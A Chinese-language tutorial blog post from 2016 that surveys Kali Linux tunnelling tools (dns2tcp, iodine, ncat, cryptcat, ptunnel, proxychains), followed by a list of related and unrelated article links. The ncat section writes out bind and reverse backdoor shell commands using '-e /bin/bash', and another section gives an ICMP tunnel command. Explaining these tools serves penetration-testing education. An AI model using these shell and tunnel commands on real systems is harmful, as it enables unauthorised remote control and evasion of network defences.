隧道工具的基本概念:

1.在计算机网络中,隧道工具是指使用一种网络协议去封装另一种网络协议的技术。

2.通常用来数据伪装或者穿越防火墙,在入侵目标系统后,可用来提升权限和权限维持。

Kali中的隧道工具介绍:

(1)dns2TCP

**是一种把tcp数据包封装成DNS协议数据包的封装工具,适用于目标主机只能发送DNS请求的网络;

**客户端:dns2tcpc

**服务端:dns2tcpd

**缺点:需要有自己的域名,配置dns

(2)iodline

**相比dns2tcp功能更强大,支持协议更多。

(3)Ncat/netcat

**Ncat是Netcat程序的改进版本,功能强大;

**可用于web服务程序和其他tcp/ip协议的客户端;

**简单tcp/udp/sctp/ssl服务端程序;

**转发代理tcp/udp/sctp流量;

**执行系统指令的网络网关;

**使用ssl加密通信数据;

**作为连接代理;

(4)ncat

**创建正向连接back door shell

**创建反向连接back door shell

**正向连接(目标机器在公网,而我们自己在局域网中):

终端输入:ncat -l 1337 -e /bin/bash   //-l参数是listen监听1337端口 -e参数是要执行的shell在bash目录下

在目标主机(192.168.1.103)上中连接:ncat 192.168.1.104   1337   //104是服务器端地址

连接后就有权限操作目标主机的shell了

**反向连接(目标主机在局域网内,而我们具有公网ip)

**或者我们和目标主机都在各自内网中,这时一般做反弹连接,反弹到我们这边的网关或者路由器上的ip地址因为它们有公网ip,然后我们需要在路由器或网关上做指定端口向内网主机指定端口映射:

在攻击主机终端输入:ncat -l 1337  //启动监听1337端口就好

在目标主机终端输入:ncat   192.168.1.104  -e  /bin/bash    //指定反弹的ip地址(即监听机的ip地址),-e参数指定反弹连接后监听机可以启用的shell

(5)cryptcat

**cryptcat是经典的网络工具netcat的加密版,使用twoflish加密算法,其密钥协商过程基于发送,接收双发共享的一个password

**-k指定密码

**-h参数可以看使用参数  -l指定为监听模式  -p指定监听的端口  -s指定监听的ip地址

(6)ICMP隧道工具ptunnel

**使用icmp封装tcp连接的隧道工具

**服务器端:ptunnel

**客户端:ptunnel -p 192.168.1.104(服务器端地址)  -lp  4567(服务器本地端口)  -da  192.168.1.103(目标主机)  -dp 22(目标主机端口)

**ssh命令访问192.168.1.103的主机时,端口转发使命令先转发到192.168.1.104的4567端口上,然后在转发到192.168.1.103的22端口上

(7)通过代理服务器创建隧道

**搭建socks5代理服务器。

**通过代理搭建隧道。

(8)Proxychains工具

**适用于通过代理服务器访问外部网络的情况;

**穿过外联端口的防火墙;

**组成代理服务器链;

**将没有代理的功能的应用使用代理对外链接。telnet。ftp。wget。等

2016.6.17 kali Linux 隧道工具的更多相关文章

  1. kali linux 一些工具及命令集1(搜集DNS信息)

    DNS信息收集 1.dnsdict6   用于查看ipv6的dns信息,国内很少ipv6,基本无用 2.dnsmap 收集dns信息,同类别还有dnsenum,dnswalk 使用dnsmap需先找到 ...

  2. kali linux fuzz工具集简述

    模糊测试是一种自动化软件测试技术,涉及提供无效,意外或随机数据作为计算机程序的输入. 然后监视程序是否存在异常,例如崩溃,内置代码断言失败或潜在的内存泄漏. 通常,模糊器用于测试采用结构化输入的程序. ...

  3. kali linux 入侵window实例

    我使用Kali Linux的IP地址是192.168.0.112:在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑. 本文演示怎么使用Metasploit入侵win ...

  4. 在vps上安装 kali linux

    在渗透测试过程中,很多时候我们需要反弹一个shell回来.使用empire也好,MSF也好,其他工具也好,都避不开公网IP的问题.这时候我们就需要一个VPS来进一步进行渗透测试. 建立通道连接的方式有 ...

  5. Kali linux 2016.2(Rolling) 的详细安装(图文教程)附安装VMare Tools 增强工具

    写在前面的话 因读研期间,实验室团队需要,所以,接触上了Kali Linux,需去获得网络安全方面的数据,即数据和信息收集.以便为后续的数据处理和分析,准备! 用到hadoop和spark.机器学习等 ...

  6. MetaSploit攻击实例讲解------工具Meterpreter常用功能介绍(kali linux 2016.2(rolling))(详细)

    不多说,直接上干货! 说在前面的话 注意啦:Meterpreter的命令非常之多,本篇博客下面给出了所有,大家可以去看看.给出了详细的中文 由于篇幅原因,我只使用如下较常用的命令. 这篇博客,利用下面 ...

  7. Python黑帽编程1.1虚拟机安装和配置 Kali Linux 2016

    Python黑帽编程1.1虚拟机安装和配置 Kali Linux 2016 0.1  本系列教程说明 本系列教程,采用的大纲母本为<Understanding Network Hacks Att ...

  8. 分享Kali Linux 2016.2第50周虚拟机

    分享Kali Linux 2016.2第50周虚拟机该虚拟机使用Kali Linux 2016.2第50周的64位镜像安装而成.基本配置如下:(1)该系统默认设置单CPU双核,内存为2GB,硬盘为50 ...

  9. Kali linux渗透测试常用工具汇总1

    1.ProxyChains 简介:代理工具.支持HTTP/SOCKS4/SOCK5的代理服务器,允许TCP/DNS通过代理隧道. 应用场景:通过代理服务器上网. 配置:/etc/proxychains ...

随机推荐

  1. 三个css3趣玩小试

    http://jsbin.com/semeh/8 请使用chrome打开 1.类似于网易新闻客户端的loading效果,左边的圆圈 2.发散式心跳效果,右边的圆圈 3.youtub上,搜索进度条效果, ...

  2. 转<<C#集合Dictionary中按值的降序排列

    转载地址:http://blog.sina.com.cn/s/blog_5c5bc9070100pped.html C#集合Dictionary中按值的降序排列 static void Main(st ...

  3. tyvj4221 货车漂移

    背景 蒟蒻中学的蒟蒻遇到了一些小问题. 描述 蒟蒻考完noip也就要回家种田了,他老家的田地在s点,可是种子市场在e点,为了购买种子,中途要经过很多城市,这导致快递费非常的贵(因为快到双11了),于是 ...

  4. 阿里云服务器配置 SVN 服务器与生产站点同步

    作为linux的门外汉,一直觊觎svn的方便性,在有台aliyun的情况下,一起来搞搞.   1.环境   阿里云 centos5.5   2.安装svn   yum -y install subve ...

  5. delphi 枚举类型

    枚举类型定义了一系列有序值的集合.枚举变量就是从这个既定的集合中取某个值.集合中的有序值可以称为元素,元素一般从0开始索引(也就是元素的顺序号). 定义一个枚举类型,采用以下的格式: type typ ...

  6. datetime中strftime和strptime用法

    from datetime import * format = "%Y-%m-%d %H:%M:%S" a=datetime.now() day=a.day b=a.replace ...

  7. 初识lua

    转自:http://www.oschina.net/question/12_115993-- 两个横线是单行注释(译者注:这跟 SQL 一样) --[[ 增加两个 [ 和 ] 变成多行注释 我是多行注 ...

  8. iOS 的UIWindow 类研究

    今日发现如果想做出漂亮的界面效果,就需要仔细研究一下UIWindow这个类.现在还不清楚为什么要有这么一个UIWindow类,它跟UIView的根本区别是什么?和Android中的什么类比较相像.先做 ...

  9. 【python】

    1.修改系统默认编码: reload(sys) sys.setdefaultencoding('utf-8') 为什么在sys.setdefaultencoding之前要写reload(sys) 因为 ...

  10. [Android Pro] 监听WIFI 打开广播

    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/> <uses-perm ...